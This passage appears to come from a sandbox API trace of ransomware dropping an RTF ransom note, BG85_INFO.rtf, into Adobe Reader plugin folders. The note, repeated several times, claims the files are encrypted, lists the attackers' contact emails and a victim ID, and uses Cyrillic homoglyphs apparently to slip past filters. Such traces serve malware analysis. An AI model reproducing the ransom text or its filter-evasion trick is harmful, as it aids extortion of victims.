\\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0065.485] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0065.709] CloseHandle (hObject=0x1dc) returned 1 [0065.710] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\esp\\bg85_info.rtf")) returned 0xffffffff [0065.710] GetLastError () returned 0x2 [0065.710] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\esp\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.711] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 